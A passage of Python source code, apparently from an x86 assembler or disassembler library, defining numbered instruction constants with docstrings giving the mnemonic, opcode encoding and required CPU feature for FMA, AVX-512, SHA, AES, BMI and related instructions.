``16/32/64-bit``
"""
VEX_VFMSUB231PD_YMM_YMM_YMMM256: int = 3551
"""
``VFMSUB231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 BA /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3552
"""
``VFMSUB231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 BA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3553
"""
``VFMSUB231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 BA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3554
"""
``VFMSUB231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 BA /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3555
"""
``VFMSUB231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 BA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3556
"""
``VFMSUB231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 BA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3557
"""
``VFMSUB231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 BA /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUB231SS_XMM_XMM_XMMM32: int = 3558
"""
``VFMSUB231SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 BB /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB231SD_XMM_XMM_XMMM64: int = 3559
"""
``VFMSUB231SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 BB /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3560
"""
``VFMSUB231SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 BB /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3561
"""
``VFMSUB231SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 BB /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMADD231PS_XMM_XMM_XMMM128: int = 3562
"""
``VFNMADD231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 BC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD231PS_YMM_YMM_YMMM256: int = 3563
"""
``VFNMADD231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 BC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD231PD_XMM_XMM_XMMM128: int = 3564
"""
``VFNMADD231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 BC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD231PD_YMM_YMM_YMMM256: int = 3565
"""
``VFNMADD231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 BC /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3566
"""
``VFNMADD231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 BC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3567
"""
``VFNMADD231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 BC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3568
"""
``VFNMADD231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 BC /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3569
"""
``VFNMADD231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 BC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3570
"""
``VFNMADD231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 BC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3571
"""
``VFNMADD231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 BC /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMADD231SS_XMM_XMM_XMMM32: int = 3572
"""
``VFNMADD231SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 BD /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD231SD_XMM_XMM_XMMM64: int = 3573
"""
``VFNMADD231SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 BD /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3574
"""
``VFNMADD231SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 BD /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3575
"""
``VFNMADD231SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 BD /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB231PS_XMM_XMM_XMMM128: int = 3576
"""
``VFNMSUB231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 BE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB231PS_YMM_YMM_YMMM256: int = 3577
"""
``VFNMSUB231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 BE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB231PD_XMM_XMM_XMMM128: int = 3578
"""
``VFNMSUB231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 BE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB231PD_YMM_YMM_YMMM256: int = 3579
"""
``VFNMSUB231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 BE /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3580
"""
``VFNMSUB231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 BE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3581
"""
``VFNMSUB231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 BE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3582
"""
``VFNMSUB231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 BE /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3583
"""
``VFNMSUB231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 BE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3584
"""
``VFNMSUB231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 BE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3585
"""
``VFNMSUB231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 BE /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB231SS_XMM_XMM_XMMM32: int = 3586
"""
``VFNMSUB231SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 BF /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB231SD_XMM_XMM_XMMM64: int = 3587
"""
``VFNMSUB231SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 BF /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3588
"""
``VFNMSUB231SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 BF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3589
"""
``VFNMSUB231SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 BF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCONFLICTD_XMM_K1Z_XMMM128B32: int = 3590
"""
``VPCONFLICTD xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 C4 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPCONFLICTD_YMM_K1Z_YMMM256B32: int = 3591
"""
``VPCONFLICTD ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 C4 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPCONFLICTD_ZMM_K1Z_ZMMM512B32: int = 3592
"""
``VPCONFLICTD zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 C4 /r``
``AVX512CD``
``16/32/64-bit``
"""
EVEX_VPCONFLICTQ_XMM_K1Z_XMMM128B64: int = 3593
"""
``VPCONFLICTQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 C4 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPCONFLICTQ_YMM_K1Z_YMMM256B64: int = 3594
"""
``VPCONFLICTQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 C4 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPCONFLICTQ_ZMM_K1Z_ZMMM512B64: int = 3595
"""
``VPCONFLICTQ zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 C4 /r``
``AVX512CD``
``16/32/64-bit``
"""
EVEX_VGATHERPF0DPS_VM32Z_K1: int = 3596
"""
``VGATHERPF0DPS vm32z {k1}``
``EVEX.512.66.0F38.W0 C6 /1 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF0DPD_VM32Y_K1: int = 3597
"""
``VGATHERPF0DPD vm32y {k1}``
``EVEX.512.66.0F38.W1 C6 /1 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF1DPS_VM32Z_K1: int = 3598
"""
``VGATHERPF1DPS vm32z {k1}``
``EVEX.512.66.0F38.W0 C6 /2 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF1DPD_VM32Y_K1: int = 3599
"""
``VGATHERPF1DPD vm32y {k1}``
``EVEX.512.66.0F38.W1 C6 /2 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF0DPS_VM32Z_K1: int = 3600
"""
``VSCATTERPF0DPS vm32z {k1}``
``EVEX.512.66.0F38.W0 C6 /5 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF0DPD_VM32Y_K1: int = 3601
"""
``VSCATTERPF0DPD vm32y {k1}``
``EVEX.512.66.0F38.W1 C6 /5 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF1DPS_VM32Z_K1: int = 3602
"""
``VSCATTERPF1DPS vm32z {k1}``
``EVEX.512.66.0F38.W0 C6 /6 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF1DPD_VM32Y_K1: int = 3603
"""
``VSCATTERPF1DPD vm32y {k1}``
``EVEX.512.66.0F38.W1 C6 /6 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF0QPS_VM64Z_K1: int = 3604
"""
``VGATHERPF0QPS vm64z {k1}``
``EVEX.512.66.0F38.W0 C7 /1 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF0QPD_VM64Z_K1: int = 3605
"""
``VGATHERPF0QPD vm64z {k1}``
``EVEX.512.66.0F38.W1 C7 /1 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF1QPS_VM64Z_K1: int = 3606
"""
``VGATHERPF1QPS vm64z {k1}``
``EVEX.512.66.0F38.W0 C7 /2 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF1QPD_VM64Z_K1: int = 3607
"""
``VGATHERPF1QPD vm64z {k1}``
``EVEX.512.66.0F38.W1 C7 /2 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF0QPS_VM64Z_K1: int = 3608
"""
``VSCATTERPF0QPS vm64z {k1}``
``EVEX.512.66.0F38.W0 C7 /5 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF0QPD_VM64Z_K1: int = 3609
"""
``VSCATTERPF0QPD vm64z {k1}``
``EVEX.512.66.0F38.W1 C7 /5 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF1QPS_VM64Z_K1: int = 3610
"""
``VSCATTERPF1QPS vm64z {k1}``
``EVEX.512.66.0F38.W0 C7 /6 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF1QPD_VM64Z_K1: int = 3611
"""
``VSCATTERPF1QPD vm64z {k1}``
``EVEX.512.66.0F38.W1 C7 /6 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
# SHA extensions: legacy (no prefix) 0F 38 C8 encoding; shares the C8 opcode
# byte with the EVEX-encoded VEXP2PS/VEXP2PD entries that follow.
SHA1NEXTE_XMM_XMMM128: int = 3612
"""
``SHA1NEXTE xmm1, xmm2/m128``
``NP 0F 38 C8 /r``
``SHA``
``16/32/64-bit``
"""
EVEX_VEXP2PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3613
"""
``VEXP2PS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.66.0F38.W0 C8 /r``
``AVX512ER``
``16/32/64-bit``
"""
EVEX_VEXP2PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3614
"""
``VEXP2PD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F38.W1 C8 /r``
``AVX512ER``
``16/32/64-bit``
"""
SHA1MSG1_XMM_XMMM128: int = 3615
"""
``SHA1MSG1 xmm1, xmm2/m128``
``NP 0F 38 C9 /r``
``SHA``
``16/32/64-bit``
"""
SHA1MSG2_XMM_XMMM128: int = 3616
"""
``SHA1MSG2 xmm1, xmm2/m128``
``NP 0F 38 CA /r``
``SHA``
``16/32/64-bit``
"""
EVEX_VRCP28PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3617
"""
``VRCP28PS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.66.0F38.W0 CA /r``
``AVX512ER``
``16/32/64-bit``
"""
EVEX_VRCP28PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3618
"""
``VRCP28PD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F38.W1 CA /r``
``AVX512ER``
``16/32/64-bit``
"""
SHA256RNDS2_XMM_XMMM128: int = 3619
"""
``SHA256RNDS2 xmm1, xmm2/m128, <XMM0>``
``NP 0F 38 CB /r``
``SHA``
``16/32/64-bit``
"""
EVEX_VRCP28SS_XMM_K1Z_XMM_XMMM32_SAE: int = 3620
"""
``VRCP28SS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.66.0F38.W0 CB /r``
``AVX512ER``
``16/32/64-bit``
"""
EVEX_VRCP28SD_XMM_K1Z_XMM_XMMM64_SAE: int = 3621
"""
``VRCP28SD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}``
``EVEX.LIG.66.0F38.W1 CB /r``
``AVX512ER``
``16/32/64-bit``
"""
SHA256MSG1_XMM_XMMM128: int = 3622
"""
``SHA256MSG1 xmm1, xmm2/m128``
``NP 0F 38 CC /r``
``SHA``
``16/32/64-bit``
"""
EVEX_VRSQRT28PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3623
"""
``VRSQRT28PS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.66.0F38.W0 CC /r``
``AVX512ER``
``16/32/64-bit``
"""
EVEX_VRSQRT28PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3624
"""
``VRSQRT28PD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F38.W1 CC /r``
``AVX512ER``
``16/32/64-bit``
"""
SHA256MSG2_XMM_XMMM128: int = 3625
"""
``SHA256MSG2 xmm1, xmm2/m128``
``NP 0F 38 CD /r``
``SHA``
``16/32/64-bit``
"""
EVEX_VRSQRT28SS_XMM_K1Z_XMM_XMMM32_SAE: int = 3626
"""
``VRSQRT28SS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.66.0F38.W0 CD /r``
``AVX512ER``
``16/32/64-bit``
"""
EVEX_VRSQRT28SD_XMM_K1Z_XMM_XMMM64_SAE: int = 3627
"""
``VRSQRT28SD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}``
``EVEX.LIG.66.0F38.W1 CD /r``
``AVX512ER``
``16/32/64-bit``
"""
GF2P8MULB_XMM_XMMM128: int = 3628
"""
``GF2P8MULB xmm1, xmm2/m128``
``66 0F 38 CF /r``
``GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8MULB_XMM_XMM_XMMM128: int = 3629
"""
``VGF2P8MULB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 CF /r``
``AVX and GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8MULB_YMM_YMM_YMMM256: int = 3630
"""
``VGF2P8MULB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 CF /r``
``AVX and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8MULB_XMM_K1Z_XMM_XMMM128: int = 3631
"""
``VGF2P8MULB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 CF /r``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8MULB_YMM_K1Z_YMM_YMMM256: int = 3632
"""
``VGF2P8MULB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 CF /r``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8MULB_ZMM_K1Z_ZMM_ZMMM512: int = 3633
"""
``VGF2P8MULB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 CF /r``
``AVX512F and GFNI``
``16/32/64-bit``
"""
AESIMC_XMM_XMMM128: int = 3634
"""
``AESIMC xmm1, xmm2/m128``
``66 0F 38 DB /r``
``AES``
``16/32/64-bit``
"""
VEX_VAESIMC_XMM_XMMM128: int = 3635
"""
``VAESIMC xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG DB /r``
``AES and AVX``
``16/32/64-bit``
"""
AESENC_XMM_XMMM128: int = 3636
"""
``AESENC xmm1, xmm2/m128``
``66 0F 38 DC /r``
``AES``
``16/32/64-bit``
"""
VEX_VAESENC_XMM_XMM_XMMM128: int = 3637
"""
``VAESENC xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG DC /r``
``AES and AVX``
``16/32/64-bit``
"""
VEX_VAESENC_YMM_YMM_YMMM256: int = 3638
"""
``VAESENC ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG DC /r``
``VAES``
``16/32/64-bit``
"""
EVEX_VAESENC_XMM_XMM_XMMM128: int = 3639
"""
``VAESENC xmm1, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG DC /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESENC_YMM_YMM_YMMM256: int = 3640
"""
``VAESENC ymm1, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG DC /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESENC_ZMM_ZMM_ZMMM512: int = 3641
"""
``VAESENC zmm1, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG DC /r``
``AVX512F and VAES``
``16/32/64-bit``
"""
AESENCLAST_XMM_XMMM128: int = 3642
"""
``AESENCLAST xmm1, xmm2/m128``
``66 0F 38 DD /r``
``AES``
``16/32/64-bit``
"""
VEX_VAESENCLAST_XMM_XMM_XMMM128: int = 3643
"""
``VAESENCLAST xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG DD /r``
``AES and AVX``
``16/32/64-bit``
"""
VEX_VAESENCLAST_YMM_YMM_YMMM256: int = 3644
"""
``VAESENCLAST ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG DD /r``
``VAES``
``16/32/64-bit``
"""
EVEX_VAESENCLAST_XMM_XMM_XMMM128: int = 3645
"""
``VAESENCLAST xmm1, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG DD /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESENCLAST_YMM_YMM_YMMM256: int = 3646
"""
``VAESENCLAST ymm1, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG DD /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESENCLAST_ZMM_ZMM_ZMMM512: int = 3647
"""
``VAESENCLAST zmm1, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG DD /r``
``AVX512F and VAES``
``16/32/64-bit``
"""
AESDEC_XMM_XMMM128: int = 3648
"""
``AESDEC xmm1, xmm2/m128``
``66 0F 38 DE /r``
``AES``
``16/32/64-bit``
"""
VEX_VAESDEC_XMM_XMM_XMMM128: int = 3649
"""
``VAESDEC xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG DE /r``
``AES and AVX``
``16/32/64-bit``
"""
VEX_VAESDEC_YMM_YMM_YMMM256: int = 3650
"""
``VAESDEC ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG DE /r``
``VAES``
``16/32/64-bit``
"""
EVEX_VAESDEC_XMM_XMM_XMMM128: int = 3651
"""
``VAESDEC xmm1, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG DE /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESDEC_YMM_YMM_YMMM256: int = 3652
"""
``VAESDEC ymm1, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG DE /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESDEC_ZMM_ZMM_ZMMM512: int = 3653
"""
``VAESDEC zmm1, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG DE /r``
``AVX512F and VAES``
``16/32/64-bit``
"""
AESDECLAST_XMM_XMMM128: int = 3654
"""
``AESDECLAST xmm1, xmm2/m128``
``66 0F 38 DF /r``
``AES``
``16/32/64-bit``
"""
VEX_VAESDECLAST_XMM_XMM_XMMM128: int = 3655
"""
``VAESDECLAST xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG DF /r``
``AES and AVX``
``16/32/64-bit``
"""
VEX_VAESDECLAST_YMM_YMM_YMMM256: int = 3656
"""
``VAESDECLAST ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG DF /r``
``VAES``
``16/32/64-bit``
"""
EVEX_VAESDECLAST_XMM_XMM_XMMM128: int = 3657
"""
``VAESDECLAST xmm1, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG DF /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESDECLAST_YMM_YMM_YMMM256: int = 3658
"""
``VAESDECLAST ymm1, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG DF /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESDECLAST_ZMM_ZMM_ZMMM512: int = 3659
"""
``VAESDECLAST zmm1, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG DF /r``
``AVX512F and VAES``
``16/32/64-bit``
"""
MOVBE_R16_M16: int = 3660
"""
``MOVBE r16, m16``
``o16 0F 38 F0 /r``
``MOVBE``
``16/32/64-bit``
"""
MOVBE_R32_M32: int = 3661
"""
``MOVBE r32, m32``
``o32 0F 38 F0 /r``
``MOVBE``
``16/32/64-bit``
"""
MOVBE_R64_M64: int = 3662
"""
``MOVBE r64, m64``
``o64 0F 38 F0 /r``
``MOVBE``
``64-bit``
"""
CRC32_R32_RM8: int = 3663
"""
``CRC32 r32, r/m8``
``F2 0F 38 F0 /r``
``SSE4.2``
``16/32/64-bit``
"""
CRC32_R64_RM8: int = 3664
"""
``CRC32 r64, r/m8``
``F2 o64 0F 38 F0 /r``
``SSE4.2``
``64-bit``
"""
MOVBE_M16_R16: int = 3665
"""
``MOVBE m16, r16``
``o16 0F 38 F1 /r``
``MOVBE``
``16/32/64-bit``
"""
MOVBE_M32_R32: int = 3666
"""
``MOVBE m32, r32``
``o32 0F 38 F1 /r``
``MOVBE``
``16/32/64-bit``
"""
MOVBE_M64_R64: int = 3667
"""
``MOVBE m64, r64``
``o64 0F 38 F1 /r``
``MOVBE``
``64-bit``
"""
CRC32_R32_RM16: int = 3668
"""
``CRC32 r32, r/m16``
``o16 F2 0F 38 F1 /r``
``SSE4.2``
``16/32/64-bit``
"""
CRC32_R32_RM32: int = 3669
"""
``CRC32 r32, r/m32``
``o32 F2 0F 38 F1 /r``
``SSE4.2``
``16/32/64-bit``
"""
CRC32_R64_RM64: int = 3670
"""
``CRC32 r64, r/m64``
``F2 o64 0F 38 F1 /r``
``SSE4.2``
``64-bit``
"""
VEX_ANDN_R32_R32_RM32: int = 3671
"""
``ANDN r32a, r32b, r/m32``
``VEX.LZ.0F38.W0 F2 /r``
``BMI1``
``16/32/64-bit``
"""
VEX_ANDN_R64_R64_RM64: int = 3672
"""
``ANDN r64a, r64b, r/m64``
``VEX.LZ.0F38.W1 F2 /r``
``BMI1``
``64-bit``
"""
VEX_BLSR_R32_RM32: int = 3673
"""
``BLSR r32, r/m32``
``VEX.LZ.0F38.W0 F3 /1``
``BMI1``
``16/32/64-bit``
"""
VEX_BLSR_R64_RM64: int = 3674
"""
``BLSR r64, r/m64``
``VEX.LZ.0F38.W1 F3 /1``
``BMI1``
``64-bit``
"""
VEX_BLSMSK_R32_RM32: int = 3675
"""
``BLSMSK r32, r/m32``
``VEX.LZ.0F38.W0 F3 /2``
``BMI1``
``16/32/64-bit``
"""
VEX_BLSMSK_R64_RM64: int = 3676
"""
``BLSMSK r64, r/m64``
``VEX.LZ.0F38.W1 F3 /2``
``BMI1``
``64-bit``
"""
VEX_BLSI_R32_RM32: int = 3677
"""
``BLSI r32, r/m32``
``VEX.LZ.0F38.W0 F3 /3``
``BMI1``
``16/32/64-bit``
"""
VEX_BLSI_R64_RM64: int = 3678
"""
``BLSI r64, r/m64``
``VEX.LZ.0F38.W1 F3 /3``
``BMI1``
``64-bit``
"""
VEX_BZHI_R32_RM32_R32: int = 3679
"""
``BZHI r32a, r/m32, r32b``
``VEX.LZ.0F38.W0 F5 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_BZHI_R64_RM64_R64: int = 3680
"""
``BZHI r64a, r/m64, r64b``
``VEX.LZ.0F38.W1 F5 /r``
``BMI2``
``64-bit``
"""
WRUSSD_M32_R32: int = 3681
"""
``WRUSSD m32, r32``
``66 0F 38 F5 /r``
``CET_SS``
``16/32/64-bit``
"""
WRUSSQ_M64_R64: int = 3682
"""
``WRUSSQ m64, r64``
``66 o64 0F 38 F5 /r``
``CET_SS``
``64-bit``
"""
VEX_PEXT_R32_R32_RM32: int = 3683
"""
``PEXT r32a, r32b, r/m32``
``VEX.LZ.F3.0F38.W0 F5 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_PEXT_R64_R64_RM64: int = 3684
"""
``PEXT r64a, r64b, r/m64``
``VEX.LZ.F3.0F38.W1 F5 /r``
``BMI2``
``64-bit``
"""
VEX_PDEP_R32_R32_RM32: int = 3685
"""
``PDEP r32a, r32b, r/m32``
``VEX.LZ.F2.0F38.W0 F5 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_PDEP_R64_R64_RM64: int = 3686
